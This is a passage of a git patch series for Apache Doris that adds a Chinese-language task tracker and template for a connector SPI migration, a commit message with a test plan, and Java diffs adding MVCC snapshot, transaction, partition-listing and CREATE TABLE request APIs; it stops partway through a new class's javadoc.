`DefaultConnectorContext.getMetaInvalidator()` impl | RFC §6.4 | — | ⏳ | — | — | — | | +| P0-T10 | `ExternalMetaCacheInvalidator`(fe-core 新类) | RFC §6.4 | — | ⏳ | — | — | — | 包装 `ExternalMetaCacheMgr` | +| P0-T11 | `PluginDrivenTransactionManager` 通用化 | RFC §7.4 | — | ⏳ | — | — | — | 删 type-specific 分支 | +| P0-T12 | `ConnectorMvccSnapshotAdapter`(fe-core 新类) | RFC §8.4 | — | ⏳ | — | — | — | impl `MvccSnapshot` | + +### 批 1:DDL + Partition SPI(W1 D1-3) + +| ID | 任务 | 设计参考 | Owner | 状态 | PR | 启动 | 完成 | 备注 | +|---|---|---|---|---|---|---|---|---| +| P0-T13 | E1:`ConnectorCreateTableRequest` + `Partition/Bucket Spec` POJO(ddl 包) | RFC §4.2 | — | ⏳ | — | — | — | 5 个类 | +| P0-T14 | E1:`ConnectorTableOps.createTable(request)` default | RFC §4.3 | — | ⏳ | — | — | — | 退化到旧 createTable | +| P0-T15 | E1:`CreateTableInfoToConnectorRequestConverter`(fe-core) | RFC §4.4 | — | ⏳ | — | — | — | | +| P0-T16 | E1:`PluginDrivenExternalCatalog.createTable(stmt)` 接通 SPI | RFC §4.4 | — | ⏳ | — | — | — | | +| P0-T17 | E10:`ConnectorTableOps.listPartitionNames` default | RFC §13.2 | — | ⏳ | — | — | — | | +| P0-T18 | E10:`ConnectorTableOps.listPartitions(handle, filter)` default | RFC §13.2 | — | ⏳ | — | — | — | | +| P0-T19 | E10:`ConnectorTableOps.listPartitionValues` default | RFC §13.2 | — | ⏳ | — | — | — | | +| P0-T20 | E10:`ConnectorPartitionInfo` 追加字段(rowCount/sizeBytes/lastModifiedMillis) | RFC §13.3 | — | ⏳ | — | — | — | 向后兼容构造器 | + +### 批 1:守门 + 测试(W1 D4-5) + +| ID | 任务 | 设计参考 | Owner | 状态 | PR | 启动 | 完成 | 备注 | +|---|---|---|---|---|---|---|---|---| +| P0-T21 | `tools/check-connector-imports.sh` 实现 | RFC §15.4 | — | ⏳ | — | — | — | 禁用 import 守门 | +| P0-T22 | maven enforcer plugin 接入脚本 | RFC §15.4 | — | ⏳ | — | — | — | | +| P0-T23 | `FakeConnectorPlugin`(fe-core test)覆盖所有 default 行为 | RFC §15.1 | — | ⏳ | — | — | — | 跑通"什么都不实现" | +| P0-T24 | JDBC regression-test 全套跑通 | RFC §17 | — | ⏳ | — | — | — | 验证 baseline | +| P0-T25 | ES regression-test 全套跑通 | RFC §17 | — | ⏳ | — | — | — | 验证 baseline | +| P0-T26 | `ConnectorMetaInvalidator` 路由测试 | RFC §15.2 | — | ⏳ | — | — | — | mock ExternalMetaCacheMgr | +| P0-T27 | `CreateTableInfoToConnectorRequestConverter` 单元测试 | RFC §15.2 | — | ⏳ | — | — | — | 覆盖 4 种 partition 风格 | + +--- + +## 阶段日志(倒序) + +### 2026-05-24 +- 创建本文件(task #11,跟踪机制建立的一部分) +- P0-T01 ✅ 完成:master plan §5(D1-D12)+ RFC §16.2(U1-U6)全部决策闭环 → decisions-log D-001..D-018 +- P0-T02 🚧 进行中:跟踪机制文件建立(README/PROGRESS/decisions-log/deviations-log/risks/tasks/_template/本文件 已成;待完成 connectors/× 8 + 00-master-plan cross-link) + +--- + +## 关联 + +- Master plan 章节:[§3.1 P0 阶段](../00-connector-migration-master-plan.md) +- RFC 详细设计:[01-spi-extensions-rfc.md](../01-spi-extensions-rfc.md) +- 决策:D-013, D-014, D-015, D-016, D-017, D-018 +- 偏差:(暂无) +- 风险:R-008(文档脱节)— 通过本跟踪机制缓解中 + +--- + +## 当前阻塞项 + +无。 + +--- + +## 注意事项 + +1. **批 0 三个 SPI 是后续所有连接器迁移的 baseline**。一旦合入主线,每个连接器都开始用,调整成本急剧上升。**先在批 0 完成后让用户 review**,再开始批 1。 +2. **P0-T11(`PluginDrivenTransactionManager` 通用化)需要小心**:它是 fe-core 内类,可能影响现有 ES/JDBC 路径。需要回归测试保证 JDBC auto-commit 不退化。 +3. **P0-T21(grep 守门)必须在 P0 结束前合入**。一旦后续连接器迁移开 PR,没有守门就可能引入禁用 import,难追溯。 +4. **P0 末加 benchmark**(R-006 缓解措施):1k catalog × `listTableNames` 性能基线。不在当前任务清单——是否要加 P0-T28?**决定**:暂不加为 P0 范围,列入 P1 task。 diff --git a/plan-doc/tasks/_template.md b/plan-doc/tasks/_template.md new file mode 100644 index 00000000000000..0d05851ffddad6 --- /dev/null +++ b/plan-doc/tasks/_template.md @@ -0,0 +1,79 @@ +# P(.) — <阶段主题> + +> 复制本模板到 `tasks/P-.md` 创建新阶段。 +> 维护规则见 [README §4](../README.md)。 + +--- + +## 元信息 + +- **状态**:⏸ 待启动 / 🚧 进行中 / ✅ 完成 / ❌ 阻塞 +- **启动日期**:YYYY-MM-DD +- **目标完成**:YYYY-MM-DD(估时 N 周) +- **实际完成**:YYYY-MM-DD(完成时填) +- **阻塞**:依赖哪些前置阶段 / 决策 / 外部条件 +- **阻塞下游**:本阶段未完成会卡哪些后续阶段 +- **主 owner**:@xxx + +--- + +## 阶段目标 + +简述本阶段要交付什么。引用 master plan / RFC 中对应章节。 + +--- + +## 验收标准 + +从 master plan 或 RFC 中同步的验收清单。本阶段所有 task 完成且本清单全部勾选才算阶段完成。 + +- [ ] 标准 1 +- [ ] 标准 2 +- [ ] ... + +--- + +## 任务清单 + +> ID 永不复用;删除的 task 标 `[deleted YYYY-MM-DD <原因>]` 保留占位。 + +| ID | 任务 | 批次 / 分组 | Owner | 状态 | PR | 启动 | 完成 | 备注 | +|---|---|---|---|---|---|---|---|---| +| P-T01 | <任务名> | 批 0 | @xxx | ⏳ pending / 🚧 / ✅ / ❌ | #NNN | YYYY-MM-DD | YYYY-MM-DD | 简短备注 | +| P-T02 | ... | | | | | | | | + +**状态图例**: +- ⏳ pending — 尚未开始 +- 🚧 进行中 +- ✅ 完成 +- ❌ 阻塞 / 失败(在备注里写原因) +- 🚫 [deleted YYYY-MM-DD] + +--- + +## 阶段日志(倒序) + +> 每完成 / 阻塞 / 重大事件加一行;日志是追溯性的,不要回头改。 + +### YYYY-MM-DD +- 描述 + +### YYYY-MM-DD +- 描述 + +--- + +## 关联 + +- Master plan 章节:[§X.Y](../00-connector-migration-master-plan.md) +- RFC 章节:[§X.Y](../01-spi-extensions-rfc.md) +- 决策:D-NNN, D-MMM +- 偏差:DV-NNN(如果有) +- 风险:R-NNN +- 连接器:[connector-name](../connectors/xxx.md)(如本阶段聚焦特定连接器) + +--- + +## 当前阻塞项(如有) + +> 描述当前未解决的阻塞、谁能解、ETA。 From aa2c2871967668b8bc917f596fe33783e45febed Mon Sep 17 00:00:00 2001 From: "Mingyu Chen (Rayner)" Date: Mon, 25 May 2026 08:02:10 -0700 Subject: [PATCH 002/128] [feat](connector) P0 SPI baseline + DDL/Partition + import gate (T03-T27) (#63582) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit ## Summary Lands the P0 SPI baseline for the catalog-SPI migration (master plan §3.1 / RFC §2.1), with zero impact on the already-migrated JDBC + ES connectors. - **Batch 0** (commits 1-2): SPI types + fe-core bridges — `ConnectorMetaInvalidator`, `ConnectorTransaction`, `ConnectorMvccSnapshot`, `ExternalMetaCacheInvalidator`, `ConnectorMvccSnapshotAdapter`, `PluginDrivenTransactionManager` generalization. - **Batch 1** (commit 3): DDL + Partition SPI — `ConnectorCreateTableRequest` + 4 spec POJOs, 4 new defaults on `ConnectorTableOps`, 3 new fields on `ConnectorPartitionInfo`, fe-core converter, `PluginDrivenExternalCatalog.createTable` routing. - **Batch 2** (commit 4): Import-gate + unit tests — `tools/check-connector-imports.sh` wired through exec-maven-plugin; `FakeConnectorPlugin` covering every default fall-through; routing tests for the invalidator; converter tests for all 4 partition styles + 2 bucket flavors. ## Commits - `[feat](connector) add P0 batch 0 SPI baseline: MetaInvalidator / Transaction / MvccSnapshot` (T03-T08) - `[feat](connector) wire P0 batch 0 SPI into fe-core` (T09-T12) - `[feat](connector) add P0 batch 1 SPI: CreateTableRequest + listPartitions` (T13-T20) - `[feat](connector) add P0 batch 2 gate + unit tests` (T21-T23, T26-T27) ## Test plan - [x] `mvn -pl fe-connector/fe-connector-api,fe-connector/fe-connector-spi -am compile` — SPI modules compile - [x] `mvn -pl fe-core -am compile -Dmaven.build.cache.enabled=false` — fe-core compile - [x] `mvn -pl fe-core checkstyle:check` — 0 violations - [x] `mvn -pl fe-connector validate` — import gate runs and passes (baseline clean) - [x] `mvn -pl fe-core -am test -Dtest='FakeConnectorPluginTest,ExternalMetaCacheInvalidatorTest,CreateTableInfoToConnectorRequestConverterTest,ConnectorPluginManagerTest,ConnectorSessionImplTest'` — 39/39 green - [x] `mvn -pl fe-connector/fe-connector-jdbc,fe-connector/fe-connector-es -am compile` — downstream connectors compile unchanged - [ ] JDBC regression-test suite (T24) — to be exercised by this PR's CI pipeline - [ ] ES regression-test suite (T25) — to be exercised by this PR's CI pipeline ## Tracking Full plan, decisions, and risk log live under `plan-doc/` in the repo (introduced by 63159837043, already on the base branch). Per-task status: `plan-doc/tasks/P0-spi-foundation.md`. --------- Co-authored-by: Claude Opus 4.7 (1M context) --- .../connector/api/ConnectorMetadata.java | 32 +++ .../connector/api/ConnectorPartitionInfo.java | 48 +++- .../doris/connector/api/ConnectorSession.java | 16 ++ .../connector/api/ConnectorTableOps.java | 57 ++++ .../connector/api/ConnectorWriteOps.java | 17 ++ .../api/ddl/ConnectorBucketSpec.java | 87 ++++++ .../api/ddl/ConnectorCreateTableRequest.java | 183 ++++++++++++ .../api/ddl/ConnectorPartitionField.java | 87 ++++++ .../api/ddl/ConnectorPartitionSpec.java | 99 +++++++ .../api/ddl/ConnectorPartitionValueDef.java | 77 +++++ .../api/handle/ConnectorTransaction.java | 55 ++++ .../api/mvcc/ConnectorMvccSnapshot.java | 112 ++++++++ .../doris/connector/spi/ConnectorContext.java | 11 + .../spi/ConnectorMetaInvalidator.java | 57 ++++ fe/fe-connector/pom.xml | 39 +++ .../ConnectorMvccSnapshotAdapter.java | 43 +++ .../connector/DefaultConnectorContext.java | 6 + .../ExternalMetaCacheInvalidator.java | 82 ++++++ ...eTableInfoToConnectorRequestConverter.java | 209 ++++++++++++++ .../PluginDrivenExternalCatalog.java | 44 +++ .../PluginDrivenTransactionManager.java | 79 +++++- .../ExternalMetaCacheInvalidatorTest.java | 107 +++++++ ...leInfoToConnectorRequestConverterTest.java | 264 ++++++++++++++++++ .../connector/fake/FakeConnectorPlugin.java | 143 ++++++++++ .../fake/FakeConnectorPluginTest.java | 187 +++++++++++++ plan-doc/HANDOFF.md | 200 ++++++------- plan-doc/PROGRESS.md | 55 ++-- plan-doc/tasks/P0-spi-foundation.md | 132 ++++++--- tools/check-connector-imports.sh | 64 +++++ 29 files changed, 2425 insertions(+), 167 deletions(-) create mode 100644 fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ddl/ConnectorBucketSpec.java create mode 100644 fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ddl/ConnectorCreateTableRequest.java create mode 100644 fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ddl/ConnectorPartitionField.java create mode 100644 fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ddl/ConnectorPartitionSpec.java create mode 100644 fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ddl/ConnectorPartitionValueDef.java create mode 100644 fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/handle/ConnectorTransaction.java create mode 100644 fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/mvcc/ConnectorMvccSnapshot.java create mode 100644 fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorMetaInvalidator.java create mode 100644 fe/fe-core/src/main/java/org/apache/doris/connector/ConnectorMvccSnapshotAdapter.java create mode 100644 fe/fe-core/src/main/java/org/apache/doris/connector/ExternalMetaCacheInvalidator.java create mode 100644 fe/fe-core/src/main/java/org/apache/doris/connector/ddl/CreateTableInfoToConnectorRequestConverter.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/connector/ExternalMetaCacheInvalidatorTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/connector/ddl/CreateTableInfoToConnectorRequestConverterTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/connector/fake/FakeConnectorPlugin.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/connector/fake/FakeConnectorPluginTest.java create mode 100755 tools/check-connector-imports.sh diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorMetadata.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorMetadata.java index 56adb847880e80..8b2cb38b65fb85 100644 --- a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorMetadata.java +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorMetadata.java @@ -17,10 +17,14 @@ package org.apache.doris.connector.api; +import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.connector.api.mvcc.ConnectorMvccSnapshot; + import java.io.Closeable; import java.io.IOException; import java.util.Collections; import java.util.Map; +import java.util.Optional; /** * Central metadata interface that a connector must implement. @@ -44,6 +48,34 @@ default Map getProperties() { return Collections.emptyMap(); } + // ──────────────────── MVCC Snapshots ──────────────────── + + /** + * Returns the current snapshot at query begin time, used as the MVCC pin + * for all subsequent reads of {@code handle}. + * + *

Returning {@link Optional#empty()} means the connector does not + * support MVCC and reads see whatever is current.

+ */ + default Optional beginQuerySnapshot( + ConnectorSession session, ConnectorTableHandle handle) { + return Optional.empty(); + } + + /** Returns the snapshot at the given wall-clock time, or empty if none. */ + default Optional getSnapshotAt( + ConnectorSession session, ConnectorTableHandle handle, + long timestampMillis) { + return Optional.empty(); + } + + /** Returns the snapshot with the given id, or empty if none. */ + default Optional getSnapshotById( + ConnectorSession session, ConnectorTableHandle handle, + long snapshotId) { + return Optional.empty(); + } + @Override default void close() throws IOException { } diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorPartitionInfo.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorPartitionInfo.java index fb8d8879ee420a..fa95ae44e6977d 100644 --- a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorPartitionInfo.java +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorPartitionInfo.java @@ -26,13 +26,31 @@ */ public final class ConnectorPartitionInfo { + /** Sentinel for "unknown" on the numeric stats fields. */ + public static final long UNKNOWN = -1L; + private final String partitionName; private final Map partitionValues; private final Map properties; + private final long rowCount; + private final long sizeBytes; + private final long lastModifiedMillis; + /** + * Backward-compatible constructor. Numeric stats fields are set to + * {@link #UNKNOWN}. + */ public ConnectorPartitionInfo(String partitionName, Map partitionValues, Map properties) { + this(partitionName, partitionValues, properties, + UNKNOWN, UNKNOWN, UNKNOWN); + } + + public ConnectorPartitionInfo(String partitionName, + Map partitionValues, + Map properties, + long rowCount, long sizeBytes, long lastModifiedMillis) { this.partitionName = Objects.requireNonNull( partitionName, "partitionName"); this.partitionValues = partitionValues == null @@ -41,6 +59,9 @@ public ConnectorPartitionInfo(String partitionName, this.properties = properties == null ? Collections.emptyMap() : Collections.unmodifiableMap(properties); + this.rowCount = rowCount; + this.sizeBytes = sizeBytes; + this.lastModifiedMillis = lastModifiedMillis; } public String getPartitionName() { @@ -55,6 +76,21 @@ public Map getProperties() { return properties; } + /** @return row count, or {@link #UNKNOWN} when not collected. */ + public long getRowCount() { + return rowCount; + } + + /** @return on-disk size in bytes, or {@link #UNKNOWN}. */ + public long getSizeBytes() { + return sizeBytes; + } + + /** @return last-modified epoch millis, or {@link #UNKNOWN}. */ + public long getLastModifiedMillis() { + return lastModifiedMillis; + } + @Override public boolean equals(Object o) { if (this == o) { @@ -64,19 +100,25 @@ public boolean equals(Object o) { return false; } ConnectorPartitionInfo that = (ConnectorPartitionInfo) o; - return partitionName.equals(that.partitionName) + return rowCount == that.rowCount + && sizeBytes == that.sizeBytes + && lastModifiedMillis == that.lastModifiedMillis + && partitionName.equals(that.partitionName) && partitionValues.equals(that.partitionValues) && properties.equals(that.properties); } @Override public int hashCode() { - return Objects.hash(partitionName, partitionValues, properties); + return Objects.hash(partitionName, partitionValues, properties, + rowCount, sizeBytes, lastModifiedMillis); } @Override public String toString() { return "ConnectorPartitionInfo{name='" + partitionName - + "', values=" + partitionValues + "}"; + + "', values=" + partitionValues + + ", rowCount=" + rowCount + + ", sizeBytes=" + sizeBytes + "}"; } } diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorSession.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorSession.java index 16a471b7dbd4b1..67324987ffd0d4 100644 --- a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorSession.java +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorSession.java @@ -17,7 +17,10 @@ package org.apache.doris.connector.api; +import org.apache.doris.connector.api.handle.ConnectorTransaction; + import java.util.Map; +import java.util.Optional; /** * Session context passed to every connector operation. @@ -60,4 +63,17 @@ public interface ConnectorSession { default Map getSessionProperties() { return java.util.Collections.emptyMap(); } + + /** + * Returns the transaction this session is currently bound to, if any. + * + *

Used by connectors whose {@code begin*} write operations need to + * attach work to an outer transaction opened by + * {@link ConnectorWriteOps#beginTransaction(ConnectorSession)}. + * Connectors with statement-scoped writes (e.g. JDBC auto-commit) can + * ignore this and the default empty value.

+ */ + default Optional getCurrentTransaction() { + return Optional.empty(); + } } diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorTableOps.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorTableOps.java index 8a6caa7cb84f6f..1870954060cd3f 100644 --- a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorTableOps.java +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorTableOps.java @@ -17,8 +17,10 @@ package org.apache.doris.connector.api; +import org.apache.doris.connector.api.ddl.ConnectorCreateTableRequest; import org.apache.doris.connector.api.handle.ConnectorColumnHandle; import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.connector.api.pushdown.ConnectorExpression; import java.util.Collections; import java.util.List; @@ -65,6 +67,27 @@ default void createTable(ConnectorSession session, "CREATE TABLE not supported"); } + /** + * Creates a table with full DDL semantics (partition, bucket, external, + * {@code IF NOT EXISTS}). + * + *

Connectors should override this when they support advanced + * {@code CREATE TABLE} options. The default degrades to the legacy + * {@link #createTable(ConnectorSession, ConnectorTableSchema, Map)}, + * dropping partition / bucket / external / {@code ifNotExists} info.

+ * + * @throws DorisConnectorException if the connector cannot honor the request + */ + default void createTable(ConnectorSession session, + ConnectorCreateTableRequest request) { + ConnectorTableSchema schema = new ConnectorTableSchema( + request.getTableName(), + request.getColumns(), + null, + request.getProperties()); + createTable(session, schema, request.getProperties()); + } + /** Drops the specified table. */ default void dropTable(ConnectorSession session, ConnectorTableHandle handle) { @@ -126,4 +149,38 @@ default org.apache.doris.thrift.TTableDescriptor buildTableDescriptor( String remoteName, int numCols, long catalogId) { return null; } + + /** + * Lists all partition display names (e.g., {@code "year=2024/month=01"}). + * + *

Should be cheap and avoid loading per-partition metadata.

+ */ + default List listPartitionNames(ConnectorSession session, + ConnectorTableHandle handle) { + return Collections.emptyList(); + } + + /** + * Lists partitions matching the optional filter, with full metadata. + * + *

Connectors should push the filter into the metastore / catalog when + * possible. {@code filter} is empty when the caller wants the full list.

+ */ + default List listPartitions(ConnectorSession session, + ConnectorTableHandle handle, + Optional filter) { + return Collections.emptyList(); + } + + /** + * Lists distinct partition column value combinations for the given columns. + * + *

Used by the {@code partition_values()} TVF and by column-distinct-value + * optimizations. Inner list order matches {@code partitionColumns}.

+ */ + default List> listPartitionValues(ConnectorSession session, + ConnectorTableHandle handle, + List partitionColumns) { + return Collections.emptyList(); + } } diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorWriteOps.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorWriteOps.java index 8c20247867d3ee..d7360dd821143b 100644 --- a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorWriteOps.java +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorWriteOps.java @@ -21,6 +21,7 @@ import org.apache.doris.connector.api.handle.ConnectorInsertHandle; import org.apache.doris.connector.api.handle.ConnectorMergeHandle; import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.connector.api.handle.ConnectorTransaction; import org.apache.doris.connector.api.write.ConnectorWriteConfig; import java.util.Collection; @@ -197,4 +198,20 @@ default void abortMerge(ConnectorSession session, ConnectorMergeHandle handle) { // default: no-op } + + // ──────────────────── TRANSACTION ──────────────────── + + /** + * Begins a new transaction scoped to a single SQL statement (auto-commit) + * or to an explicit BEGIN..COMMIT block. The returned transaction is passed + * to subsequent {@code begin*} / {@code finish*} / {@code abort*} calls via + * the same {@link ConnectorSession}. + * + *

Connectors that do not support multi-statement transactions can either + * return a no-op transaction whose commit/rollback do nothing, or throw, in + * which case the engine treats every statement as auto-commit.

+ */ + default ConnectorTransaction beginTransaction(ConnectorSession session) { + throw new DorisConnectorException("Transactions not supported"); + } } diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ddl/ConnectorBucketSpec.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ddl/ConnectorBucketSpec.java new file mode 100644 index 00000000000000..32c5381a279658 --- /dev/null +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ddl/ConnectorBucketSpec.java @@ -0,0 +1,87 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.api.ddl; + +import java.util.Collections; +import java.util.List; +import java.util.Objects; + +/** + * Bucket / distribution specification carried by + * {@link ConnectorCreateTableRequest}. + * + *

{@code algorithm} is a connector-known string. Common values:

+ *
    + *
  • {@code "hive_hash"} — Hive-compatible 32-bit hash.
  • + *
  • {@code "iceberg_bucket"} — Iceberg bucket transform.
  • + *
  • {@code "doris_default"} — Doris CRC32 distribution.
  • + *
+ */ +public final class ConnectorBucketSpec { + + private final List columns; + private final int numBuckets; + private final String algorithm; + + public ConnectorBucketSpec(List columns, int numBuckets, + String algorithm) { + this.columns = columns == null + ? Collections.emptyList() + : Collections.unmodifiableList(columns); + this.numBuckets = numBuckets; + this.algorithm = Objects.requireNonNull(algorithm, "algorithm"); + } + + public List getColumns() { + return columns; + } + + public int getNumBuckets() { + return numBuckets; + } + + public String getAlgorithm() { + return algorithm; + } + + @Override + public boolean equals(Object o) { + if (this == o) { + return true; + } + if (!(o instanceof ConnectorBucketSpec)) { + return false; + } + ConnectorBucketSpec that = (ConnectorBucketSpec) o; + return numBuckets == that.numBuckets + && columns.equals(that.columns) + && algorithm.equals(that.algorithm); + } + + @Override + public int hashCode() { + return Objects.hash(columns, numBuckets, algorithm); + } + + @Override + public String toString() { + return "ConnectorBucketSpec{algorithm=" + algorithm + + ", columns=" + columns + + ", numBuckets=" + numBuckets + "}"; + } +} diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ddl/ConnectorCreateTableRequest.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ddl/ConnectorCreateTableRequest.java new file mode 100644 index 00000000000000..b3c9efe54cfa95 --- /dev/null +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ddl/ConnectorCreateTableRequest.java @@ -0,0 +1,183 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.api.ddl; + +import org.apache.doris.connector.api.ConnectorColumn; + +import java.util.Collections; +import java.util.LinkedHashMap; +import java.util.List; +import java.util.Map; +import java.util.Objects; + +/** + * Full {@code CREATE TABLE} payload passed to + * {@code ConnectorTableOps.createTable(session, request)}. + * + *

Carries partition / bucket / external / {@code IF NOT EXISTS} information + * absent from the legacy + * {@code createTable(session, ConnectorTableSchema, Map)} + * signature.

+ * + *

{@code partitionSpec} and {@code bucketSpec} are nullable when the + * underlying DDL omits them.

+ */ +public final class ConnectorCreateTableRequest { + + private final String dbName; + private final String tableName; + private final List columns; + private final ConnectorPartitionSpec partitionSpec; + private final ConnectorBucketSpec bucketSpec; + private final String comment; + private final Map properties; + private final boolean ifNotExists; + private final boolean external; + + private ConnectorCreateTableRequest(Builder b) { + this.dbName = Objects.requireNonNull(b.dbName, "dbName"); + this.tableName = Objects.requireNonNull(b.tableName, "tableName"); + this.columns = b.columns == null + ? Collections.emptyList() + : Collections.unmodifiableList(b.columns); + this.partitionSpec = b.partitionSpec; + this.bucketSpec = b.bucketSpec; + this.comment = b.comment; + this.properties = b.properties == null + ? Collections.emptyMap() + : Collections.unmodifiableMap(b.properties); + this.ifNotExists = b.ifNotExists; + this.external = b.external; + } + + public String getDbName() { + return dbName; + } + + public String getTableName() { + return tableName; + } + + public List getColumns() { + return columns; + } + + /** @return partition spec, or {@code null} for non-partitioned tables. */ + public ConnectorPartitionSpec getPartitionSpec() { + return partitionSpec; + } + + /** @return bucket spec, or {@code null} when no bucketing is declared. */ + public ConnectorBucketSpec getBucketSpec() { + return bucketSpec; + } + + public String getComment() { + return comment; + } + + public Map getProperties() { + return properties; + } + + public boolean isIfNotExists() { + return ifNotExists; + } + + public boolean isExternal() { + return external; + } + + public static Builder builder() { + return new Builder(); + } + + @Override + public String toString() { + return "ConnectorCreateTableRequest{" + dbName + "." + tableName + + ", cols=" + columns.size() + + ", partition=" + partitionSpec + + ", bucket=" + bucketSpec + + ", external=" + external + + ", ifNotExists=" + ifNotExists + "}"; + } + + public static final class Builder { + private String dbName; + private String tableName; + private List columns; + private ConnectorPartitionSpec partitionSpec; + private ConnectorBucketSpec bucketSpec; + private String comment; + private Map properties; + private boolean ifNotExists; + private boolean external; + + public Builder dbName(String dbName) { + this.dbName = dbName; + return this; + } + + public Builder tableName(String tableName) { + this.tableName = tableName; + return this; + } + + public Builder columns(List columns) { + this.columns = columns; + return this; + } + + public Builder partitionSpec(ConnectorPartitionSpec partitionSpec) { + this.partitionSpec = partitionSpec; + return this; + } + + public Builder bucketSpec(ConnectorBucketSpec bucketSpec) { + this.bucketSpec = bucketSpec; + return this; + } + + public Builder comment(String comment) { + this.comment = comment; + return this; + } + + public Builder properties(Map properties) { + // copy to preserve caller's map identity and keep insertion order + this.properties = properties == null + ? null + : new LinkedHashMap<>(properties); + return this; + } + + public Builder ifNotExists(boolean ifNotExists) { + this.ifNotExists = ifNotExists; + return this; + } + + public Builder external(boolean external) { + this.external = external; + return this; + } + + public ConnectorCreateTableRequest build() { + return new ConnectorCreateTableRequest(this); + } + } +} diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ddl/ConnectorPartitionField.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ddl/ConnectorPartitionField.java new file mode 100644 index 00000000000000..ce16c29973440a --- /dev/null +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ddl/ConnectorPartitionField.java @@ -0,0 +1,87 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.api.ddl; + +import java.util.Collections; +import java.util.List; +import java.util.Objects; + +/** + * A single field in a {@link ConnectorPartitionSpec}. + * + *

The {@code transform} string follows Appendix B of the connector SPI RFC: + * {@code identity / year / month / day / hour / bucket / truncate / list / range}. + * Unlisted values are treated as {@code CUSTOM} and interpreted by the connector.

+ * + *

{@code transformArgs} carries numeric parameters (e.g., {@code [16]} for + * {@code bucket(16, col)} or {@code [10]} for {@code truncate(10, col)}).

